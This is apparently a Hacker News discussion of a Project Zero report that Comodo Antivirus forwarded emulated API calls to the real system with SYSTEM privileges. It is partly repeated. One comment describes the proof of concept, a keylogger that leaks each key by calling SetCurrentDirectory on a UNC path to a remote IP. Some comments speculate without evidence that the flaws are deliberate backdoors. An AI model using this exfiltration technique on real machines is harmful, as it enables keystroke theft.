Comodo Antivirus Forwards Emulated API Calls to the Real API During Scans (opens in new tab)

(bugs.chromium.org)

150 pointscespare10y ago35 comments

35 comments

25 comments · 10 top-level

willvarfar10y ago· 4 in thread

Google's Project-Zero https://en.wikipedia.org/wiki/Project_Zero_(Google) is absolutely excellent! Google task top-notch engineers to find zero-day bugs in other company's products, making us all safer.

Very big kudos to Google! The flood of bugs they keep finding and getting other companies to fix is fantastic!

jlgaddis10y ago

Indeed, they've done some great work.

It's times like this that make me I'm glad I'm not a developer. If I were, I'd be forever worried that today is the day I open up my mail client and see a new message from 'taviso@'.

CiPHPerCoder10y ago

I'd look forward to it, personally, but I like learning new things about security.

Someone123410y ago

I'd likely donate if it helped the effort. Project Zero has been very successful in terms of vulnerabilities they've had fixed.

chatmasta10y ago

I don't think Google needs your money. Best keep it in your pocket.

But yeah, agreed. Project Zero is amazing. It seems like every iOS security release includes at least one major zero-day discovered by Ian Beer.

There is definitely some major talent on that team. It makes me wonder what an equivalently skilled team would look like on the "black market."

Natanael_L10y ago· 2 in thread

Never trusted the sandbox functionality. I've been installing Comodo CIS with only the firewall and antivirus, sandboxing disabled, HIPS on low settings on. Any notable exploits left that would bypass that?

ionised10y ago

I basically just use it for the Firewall and HIPS too, because I cannot find another free firewall solution (that isn't Windows firewall) that is any good, and I cannot find any other example of an HIPS that is as easy to set up and run as the Comodo one.

That said, I'm getting seriously tired of their shadyness/incompetence recently.

I need alternatives.

amluto10y ago

> that isn't Windows firewall

What's wrong with Windows firewall/defender/anti-virus/whatever it's called these days? It's free, it doesn't try to market itself to you, it doesn't smell like malware, and it doesn't seem to show up in these regular sweeps of disastrous security bugs in the third-party solutions.

1 more reply

jwr10y ago· 2 in thread

"used to forward", from what I understand this has been fixed.

willvarfar10y ago

Would you trust them to fix it?

Seems such a big red flag (as though things couldn't get worse for AV-cred these days).

Kliment10y ago

It's a huge red flag - they've temporarily disabled the function while they audit all APIs they're calling, but they still believe their core design is ok - this means they'll go back to emulate with pass-through everything that THEY can't figure a way to exploit.

1 more reply

RubyPinch10y ago· 2 in thread

Does anyone have any good experiences with any anti-virus software?

woodman10y ago

17 years ago I used F-prot to disinfect my school's computer lab after it was completely overrun by the Melissa worm. The antivirus industry has certainly earned its terrible reputation, but F-prot was actually pretty good software. It was the first with a heuristics engine, and I remember it actually working on a few occasions.

borispavlovic10y ago

Anti-virus software vendors, for example.

dkopi10y ago· 1 in thread

When it comes to security research, Tavis Ormandy is truly inspirational. It isn't just about the bugs he discovers, but I find his explanations often very simple to understand.

This is an extremely severe design issue, where an Anti Virus can not only be bypassed, but it can actually be used to compromise an attacked system. Comodo runs suspicious code inside an emulator(VM), but instead of implementing full OS emulation, they allow a lot of the API calls inside the emulator to leak out to the hosting computer, and actually run them with NT AUTHORITY\SYSTEM privileges(The windows equivalent of root).

The exploit code serves as a simple key logger, by repeatedly calling GetKeyState(With system privileges!), and leaking this information to a remote server using the SetCurrentDirectory() API (By calling SetCurrentDirectory("\\\\?\\UNC\\192.168.237.1\\<Pressed key>")

This is a beautiful attack, and I couldn't help but smirk at the "wtf!!!!" comment.

vog10y ago

> This is an extremely severe design issue, where an Anti Virus can not only be bypassed, but it can actually be used to compromise an attacked system.

Don't we have exactly that design issue in all anti-virus tools, by definition?

All potentially dangerous data is routed through that single tool that runs with high permissions and performs complex computations. Every single programming error in the anti-virus tool (e.g. a buffer overflow) can potentially lead to a compromised system. An attacker can now choose not just between vulnerabilities of browser, mail client and operating system, but also use vulnerabilities of the anti-virus tool.

So anti-virus is by definition a tool with complex behaviour and a large attack surface.

For many security people, this alone qualifies anti-virus tools as additional threat, not as part of the solution - even without dramatic failures as shown in this particular case.

sccxy10y ago· 1 in thread

Some previous Comodo issues:

Comodo ships Adware Privdog worse than Superfish

https://news.ycombinator.com/item?id=9091917

Comodo “Chromodo” Browser disables same origin policy

https://news.ycombinator.com/item?id=11021633

Comodo Internet Security installs and starts a VNC server by default

https://news.ycombinator.com/item?id=11129170

AdmiralAsshat10y ago

There is no doubt some engineer at Comodo whose heart sinks every time he/she thinks Tavis is done tearing their software apart and opens their bug reports to find yet another gaping security hole.

vog10y ago· 1 in thread

Actually, we find two issues here:

1) that this huge attack surface existed in the first place. (almost by design)

2) how they "fixed" it. (not questioning their design at all)

The whole bugreport reads like an invitation to find more creative combinations of API calls that their filter forwards to the system. From the first comment:

> They're planning to fix those two issues and review all the remaining API's for missing parameter filtering, but wanted to know if I agree that their design is sound. I said I suppose they're correct in theory, but this is a lot of attack surface [...]

ikeboy10y ago

>We have also disabled this feature by default UNTIL we complete the security review.

So creative combinations won't help until they reenable it.

wjnc10y ago· 1 in thread

My first thought is: so now I am relying on a company that basicly provides me free services for security audits of other companies, some of which I pay for the services they deliver. (Last one is a stretch.) Of course, I rely on many free things, but it's the second order aspect here that troubles me.

Is there an indication of the complexity of the bugs they are finding? Are they among those that should be caught be QA?

ploxiln10y ago

It's a new kind of incompetent-but-too-big company: "too big for google to not give you free expert security review". Well, it's just for companies that can make google's stuff look bad when they enable users to be badly infested with malware.

The magnitude of it in this case is pretty funny ... can you imagine Comodo "security suite" or whatever just 3 months ago? A special secure browser without secure origin policy, a local poorly secured vnc server, a scanning and parsing engine that continually exposes itself to un-trusted input but has ASLR disabled ...

Most of these are not really complicated, they're bad feature ideas. But mass-market security products are feature-driven, not security-driven. So it makes sense that they suck at security.

cesarb10y ago· 1 in thread

Looking at this issue and the the issues linked in its last comment...

Why are they running things like unpackers and emulators as "NT AUTHORITY\SYSTEM", instead of farming them to less privileged processes?

mtgx10y ago

From the many issues I've seen with Comodo products, either they don't know what they are doing or are doing it on purpose this way (plausible deniability backdoors).

justsaysmthng10y ago

My god what a mess. I think virus writers and hackers should specifically target anti virus suites, given how much of a security risk these pose to the user. Heh, I guess they do just that. I wouldn't be surprised if some of the virus and anti-virus writers are one and the same people or organizations. Because it makes a lot of sense - open the door to intruders and then tell users it's their fault, then manipulate them into buying your security product. Rinse and repeat and make millions.

j / k navigate · click thread line to collapse

35 comments

25 comments · 10 top-level

willvarfar10y ago· 4 in thread

Very big kudos to Google! The flood of bugs they keep finding and getting other companies to fix is fantastic!

jlgaddis10y ago

Indeed, they've done some great work.

It's times like this that make me I'm glad I'm not a developer. If I were, I'd be forever worried that today is the day I open up my mail client and see a new message from 'taviso@'.

CiPHPerCoder10y ago

I'd look forward to it, personally, but I like learning new things about security.

Someone123410y ago

I'd likely donate if it helped the effort. Project Zero has been very successful in terms of vulnerabilities they've had fixed.

chatmasta10y ago

I don't think Google needs your money. Best keep it in your pocket.

But yeah, agreed. Project Zero is amazing. It seems like every iOS security release includes at least one major zero-day discovered by Ian Beer.

There is definitely some major talent on that team. It makes me wonder what an equivalently skilled team would look like on the "black market."

Natanael_L10y ago· 2 in thread

ionised10y ago

That said, I'm getting seriously tired of their shadyness/incompetence recently.

I need alternatives.

amluto10y ago

> that isn't Windows firewall

1 more reply

jwr10y ago· 2 in thread

"used to forward", from what I understand this has been fixed.

willvarfar10y ago

Would you trust them to fix it?

Seems such a big red flag (as though things couldn't get worse for AV-cred these days).

Kliment10y ago

1 more reply

RubyPinch10y ago· 2 in thread

Does anyone have any good experiences with any anti-virus software?

woodman10y ago

borispavlovic10y ago

Anti-virus software vendors, for example.

dkopi10y ago· 1 in thread

When it comes to security research, Tavis Ormandy is truly inspirational. It isn't just about the bugs he discovers, but I find his explanations often very simple to understand.

This is a beautiful attack, and I couldn't help but smirk at the "wtf!!!!" comment.

vog10y ago

> This is an extremely severe design issue, where an Anti Virus can not only be bypassed, but it can actually be used to compromise an attacked system.

Don't we have exactly that design issue in all anti-virus tools, by definition?

So anti-virus is by definition a tool with complex behaviour and a large attack surface.

For many security people, this alone qualifies anti-virus tools as additional threat, not as part of the solution - even without dramatic failures as shown in this particular case.

sccxy10y ago· 1 in thread

Some previous Comodo issues:

Comodo ships Adware Privdog worse than Superfish

https://news.ycombinator.com/item?id=9091917

Comodo “Chromodo” Browser disables same origin policy

https://news.ycombinator.com/item?id=11021633

Comodo Internet Security installs and starts a VNC server by default

https://news.ycombinator.com/item?id=11129170

AdmiralAsshat10y ago

There is no doubt some engineer at Comodo whose heart sinks every time he/she thinks Tavis is done tearing their software apart and opens their bug reports to find yet another gaping security hole.

vog10y ago· 1 in thread

Actually, we find two issues here:

1) that this huge attack surface existed in the first place. (almost by design)

2) how they "fixed" it. (not questioning their design at all)

The whole bugreport reads like an invitation to find more creative combinations of API calls that their filter forwards to the system. From the first comment:

ikeboy10y ago

>We have also disabled this feature by default UNTIL we complete the security review.

So creative combinations won't help until they reenable it.

wjnc10y ago· 1 in thread

Is there an indication of the complexity of the bugs they are finding? Are they among those that should be caught be QA?

ploxiln10y ago

Most of these are not really complicated, they're bad feature ideas. But mass-market security products are feature-driven, not security-driven. So it makes sense that they suck at security.

cesarb10y ago· 1 in thread

Looking at this issue and the the issues linked in its last comment...

Why are they running things like unpackers and emulators as "NT AUTHORITY\SYSTEM", instead of farming them to less privileged processes?

mtgx10y ago

From the many issues I've seen with Comodo products, either they don't know what they are doing or are doing it on purpose this way (plausible deniability backdoors).

justsaysmthng10y ago

j / k navigate · click thread line to collapse